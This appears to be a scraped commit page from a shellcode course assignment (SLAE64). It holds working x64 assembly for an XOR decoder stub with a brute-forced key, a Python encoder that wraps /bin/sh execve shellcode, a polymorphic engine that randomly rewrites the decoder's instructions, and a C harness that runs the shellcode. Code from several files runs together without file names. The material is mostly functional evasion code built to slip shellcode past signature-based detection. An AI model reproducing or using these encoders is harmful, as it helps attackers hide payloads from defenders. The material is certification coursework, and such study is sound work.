Commit 03d95206 authored by André Lima's avatar André Lima


parent bcd18f43
global _start
section .text
jmp find_address ; jmp short by default
; Get the address of the string
pop rdi
push rdi
pop rbx
; get the first byte and bruteforce till you get the token 0x90
mov byte dl, [rdi]
xor rdi,rdi ; key that will be incremented from 0x00 to 0xff
inc rdi
mov al,dl
xor al,dil
cmp al,0x90
jne bruteforce
push 27 ; shellcode length (given by encoder)
pop rcx
mov al,dil
push rbx
pop rdi
xor byte [rdi], al
inc rdi
loop decode
jmp rbx ; jmp to decoded shellcode
call decoder
encoded db 0x23,0xd9,0x88,0xeb,0x2a,0xe1,0xfb,0x08,0x9c,0x9c,0xd1,0xda,0xdd,0x9c,0xc0,0xdb,0xe0,0xe7,0xec,0xe1,0xe7,0xed,0xe4,0xe7,0xe9,0xbc,0xb6
from random import randint
encoded = ""
encoded2 = ""
R = randint(0,2**8-1)
shellcode = ("\x90" + "\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x54\x5e\x57\x54\x5a\x0f\x05")
print "random generated number (key): 0x%02x" %R
for x in bytearray(shellcode):
# XOR Encoding
y = x ^ R
encoded += "\\x"
encoded += "%02x" %y
encoded2 += "0x"
encoded2 += "%02x," %y
encoded2 = encoded2[0:-1] # the [0:-1] is just to remove the "," at the end
print "Encoded shellcode ..."
print encoded
print encoded2
print "Len: %d" % len(bytearray(shellcode))
tab = " "
poly_db = { "pop rdi":
[tab+"pop rdi\n",
tab+"mov rdi,[rsp]\n"+tab+"add rsp,8\n"],
"push <param1>|pop <param2>":
[tab+"push <param1>\n"+tab+"pop <param2>\n",
tab+"mov <param2>,<param1>\n"],
"mov byte dl,[rdi]":
[tab+"mov byte dl,[rdi]\n",
tab+"mov r9,rdi\n"+tab+"mov byte dl,[r9]\n"],
"xor rdi,rdi":
[tab+"xor rdi,rdi\n",
tab+"sub rdi,rdi\n"],
"inc rdi":
[tab+"inc rdi\n",
tab+"dec rdi\n"+tab+"add rdi,2\n"],
"mov byte <param1>,byte <param2>":
[tab+"mov <param1>,<param2>\n",
tab+"mov r9b,<param2>\n"+tab+"mov <param1>,r9b\n"],
"xor al,dil":
[tab+"xor al,dil\n",
tab+"mov r9b,dil\n"+tab+"xor al,r9b\n"],
"cmp al,0x90":
[tab+"cmp al,0x90\n",
tab+"mov ah,0xff\n"+tab+"cmp ax,0xff90\n"],
"push <number>|pop <param2>":
[tab+"push <param1>\n"+tab+"pop <param2>\n",
tab+"xor <param2>,<param2>\n"+tab+"add <param2>,<param1>\n"],
"xor byte [rdi],al":
[tab+"xor byte [rdi],al\n",
tab+"mov byte r9b,[rdi]\n"+tab+"xor r9b,al\n"+tab+"mov byte [rdi],r9b\n"],
"loop decode":
[tab+"loop decode\n",
tab+"dec rcx\n"+tab+"xor r9,r9\n"+tab+"cmp r9,rcx\n"+tab+"jne decode\n"]
def poly(instruction,param1="",param2="",param3=""):
options = poly_db[instruction]
r = randint(0,len(options)-1)
str = options[r]
str = str.replace("<param1>",param1)
str = str.replace("<param2>",param2)
str = str.replace("<param3>",param3)
return str
code = "global _start \n"
code += "\n"
code += "section .text\n"
code += "\n"
code += "_start:\n"
code += " jmp short find_address\n"
code += "decoder:\n"
code += " ; Get the address of the string \n"
code += poly("pop rdi")
code += poly("push <param1>|pop <param2>","rdi","rbx")
code += "\n"
code += " ; get the first byte and bruteforce till you get the token 0x90\n"
code += poly("mov byte dl,[rdi]")
code += poly("xor rdi,rdi") # key that will be incremented from 0x00 to 0xff
code += "bruteforce:\n"
code += poly("inc rdi")
code += poly("mov byte <param1>,byte <param2>","al","dl")
code += poly("xor al,dil")
code += poly("cmp al,0x90")
code += " jne bruteforce\n"
code += "\n"
code += poly("push <number>|pop <param2>",str(len(bytearray(shellcode))),"rcx")
code += poly("mov byte <param1>,byte <param2>","al","dil")
code += poly("push <param1>|pop <param2>","rbx","rdi")
code += "decode:\n"
code += poly("xor byte [rdi],al")
code += poly("inc rdi")
code += poly("loop decode")
code += "\n"
code += " jmp rbx\n" # jmp to decoded shellcode
code += " \n"
code += "find_address:\n"
code += " call decoder\n"
code += " encoded db " + encoded2 + "\n"
fout = open("decoder.nasm","w")
unsigned char code[] = \
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
......@@ -4,6 +4,9 @@ Assigment 2 - x64 rev tcp shell with auth
Assigment 3 - x64 Egg hunter
Assigment 4 - Custom x64 encoder with a basic polymorphic engine implementation
This code has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment